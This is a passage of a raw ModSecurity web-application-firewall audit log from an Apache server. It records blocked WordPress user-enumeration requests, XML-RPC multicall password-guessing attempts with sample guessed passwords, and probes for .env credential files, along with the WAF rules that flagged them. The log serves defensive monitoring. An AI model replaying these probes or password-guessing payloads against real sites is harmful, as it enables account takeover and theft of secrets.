271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748158081470828 2545 (- - -) Stopwatch2: 1748158081470828 2545; combined=903, p1=369, p2=509, p3=0, p4=0, p5=25, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d30fe402-Z-- --5814bc76-A-- [25/May/2025:14:40:41 +0700] aDLJederygsLmB9N_YSDZQAAAJY 103.236.140.4 54588 103.236.140.4 8181 --5814bc76-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 195.47.238.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.47.238.88 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5814bc76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5814bc76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748158841856891 3486 (- - -) Stopwatch2: 1748158841856891 3486; combined=1974, p1=595, p2=1345, p3=0, p4=0, p5=33, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5814bc76-Z-- --4e88285c-A-- [25/May/2025:14:46:37 +0700] aDLK3derygsLmB9N_YSGEgAAAJI 103.236.140.4 57906 103.236.140.4 8181 --4e88285c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4e88285c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix.co.uk --4e88285c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e88285c-E-- --4e88285c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.18.232.22 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748159197970646 5283 (- - -) Stopwatch2: 1748159197970646 5283; combined=4081, p1=449, p2=3466, p3=0, p4=0, p5=98, sr=84, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e88285c-Z-- --42142106-A-- [25/May/2025:14:46:39 +0700] aDLK39erygsLmB9N_YSGGwAAAJg 103.236.140.4 57924 103.236.140.4 8181 --42142106-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 84.247.150.34 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 84.247.150.34 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --42142106-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix.co.uk --42142106-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42142106-E-- --42142106-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 84.247.150.34 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748159199791962 5601 (- - -) Stopwatch2: 1748159199791962 5601; combined=4045, p1=480, p2=3399, p3=0, p4=0, p5=98, sr=111, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42142106-Z-- --4eb90935-A-- [25/May/2025:14:58:57 +0700] aDLNwderygsLmB9N_YSJmAAAAJI 103.236.140.4 36244 103.236.140.4 8181 --4eb90935-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.83.37.35 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.83.37.35 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4eb90935-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmifahmi!@#$%^&*() --4eb90935-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --4eb90935-E-- --4eb90935-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748159937125440 5734 (- - -) Stopwatch2: 1748159937125440 5734; combined=4239, p1=448, p2=3564, p3=30, p4=35, p5=96, sr=85, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4eb90935-Z-- --55016a26-A-- [25/May/2025:14:59:22 +0700] aDLN2hEdxfhJOSxH8A8jJgAAAEU 103.236.140.4 36478 103.236.140.4 8181 --55016a26-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 142.93.31.43 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 142.93.31.43 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --55016a26-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmifahmi!@#$%^&*() --55016a26-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --55016a26-E-- --55016a26-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748159962822460 6576 (- - -) Stopwatch2: 1748159962822460 6576; combined=4826, p1=434, p2=4166, p3=32, p4=35, p5=98, sr=71, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55016a26-Z-- --17d3571f-A-- [25/May/2025:15:03:23 +0700] aDLOy3P6UgzLD1l8HTootgAAAA4 103.236.140.4 38698 103.236.140.4 8181 --17d3571f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.156.104 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.156.104 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --17d3571f-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmi&fahmi& --17d3571f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --17d3571f-E-- --17d3571f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748160203567485 5367 (- - -) Stopwatch2: 1748160203567485 5367; combined=3827, p1=393, p2=3131, p3=82, p4=61, p5=97, sr=66, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17d3571f-Z-- --98799d4c-A-- [25/May/2025:15:32:45 +0700] aDLVrderygsLmB9N_YSQugAAAIo 103.236.140.4 54892 103.236.140.4 8181 --98799d4c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.124.39.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.124.39.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --98799d4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98799d4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748161965334321 2801 (- - -) Stopwatch2: 1748161965334321 2801; combined=1252, p1=424, p2=800, p3=0, p4=0, p5=28, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98799d4c-Z-- --f163c27c-A-- [25/May/2025:15:51:58 +0700] aDLaLhEdxfhJOSxH8A8svQAAAFQ 103.236.140.4 37328 103.236.140.4 8181 --f163c27c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.72.211.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.72.211.158 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f163c27c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f163c27c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748163118493077 2715 (- - -) Stopwatch2: 1748163118493077 2715; combined=1483, p1=509, p2=941, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f163c27c-Z-- --92e6a371-A-- [25/May/2025:16:06:04 +0700] aDLdfBEdxfhJOSxH8A8vswAAAFQ 103.236.140.4 45142 103.236.140.4 8181 --92e6a371-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 31.56.56.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.153 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --92e6a371-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92e6a371-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748163964493173 794 (- - -) Stopwatch2: 1748163964493173 794; combined=327, p1=290, p2=0, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92e6a371-Z-- --68ada334-A-- [25/May/2025:16:12:26 +0700] aDLe-nawJq5017Xs8D4bnAAAAMI 103.236.140.4 48650 103.236.140.4 8181 --68ada334-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.55.127 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.55.127 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15 --68ada334-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68ada334-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748164346623566 1010 (- - -) Stopwatch2: 1748164346623566 1010; combined=401, p1=354, p2=0, p3=0, p4=0, p5=47, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68ada334-Z-- --b47ffc26-A-- [25/May/2025:16:12:27 +0700] aDLe-9erygsLmB9N_YSfrQAAAJE 103.236.140.4 48658 103.236.140.4 8181 --b47ffc26-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.55.127 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.55.127 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15 --b47ffc26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b47ffc26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748164347165588 757 (- - -) Stopwatch2: 1748164347165588 757; combined=345, p1=311, p2=0, p3=0, p4=0, p5=34, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b47ffc26-Z-- --5650d211-A-- [25/May/2025:16:37:23 +0700] aDLk03awJq5017Xs8D4jWQAAAMA 103.236.140.4 34246 103.236.140.4 8181 --5650d211-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5650d211-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantix28 --5650d211-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5650d211-E-- --5650d211-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748165843019268 4853 (- - -) Stopwatch2: 1748165843019268 4853; combined=3409, p1=398, p2=2871, p3=0, p4=0, p5=82, sr=71, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5650d211-Z-- --b7bbb95e-A-- [25/May/2025:16:40:07 +0700] aDLldxEdxfhJOSxH8A84JgAAAE4 103.236.140.4 35686 103.236.140.4 8181 --b7bbb95e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b7bbb95e-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantix2026 --b7bbb95e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7bbb95e-E-- --b7bbb95e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748166007179427 5459 (- - -) Stopwatch2: 1748166007179427 5459; combined=3957, p1=461, p2=3325, p3=0, p4=0, p5=100, sr=87, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7bbb95e-Z-- --a7c45259-A-- [25/May/2025:16:44:45 +0700] aDLmjXawJq5017Xs8D4lgAAAAMs 103.236.140.4 37112 103.236.140.4 8181 --a7c45259-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a7c45259-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFahmi1234!@#$ --a7c45259-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7c45259-E-- --a7c45259-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748166285496140 5572 (- - -) Stopwatch2: 1748166285496140 5572; combined=4105, p1=485, p2=3413, p3=0, p4=0, p5=133, sr=88, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7c45259-Z-- --5634a148-A-- [25/May/2025:16:47:52 +0700] aDLnSHP6UgzLD1l8HTpBEgAAABA 103.236.140.4 37894 103.236.140.4 8181 --5634a148-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5634a148-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFahmi2009! --5634a148-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5634a148-E-- --5634a148-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748166472989563 5186 (- - -) Stopwatch2: 1748166472989563 5186; combined=4069, p1=443, p2=3454, p3=0, p4=0, p5=101, sr=78, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5634a148-Z-- --66c67444-A-- [25/May/2025:16:59:13 +0700] aDLp8XP6UgzLD1l8HTpCBgAAAAQ 103.236.140.4 40756 103.236.140.4 8181 --66c67444-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 54.78.115.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --66c67444-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66c67444-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748167153127566 2888 (- - -) Stopwatch2: 1748167153127566 2888; combined=1314, p1=429, p2=845, p3=0, p4=0, p5=40, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66c67444-Z-- --6415bb61-A-- [25/May/2025:17:08:51 +0700] aDLsMxEdxfhJOSxH8A86nwAAAEw 103.236.140.4 42306 103.236.140.4 8181 --6415bb61-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.16.65.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: 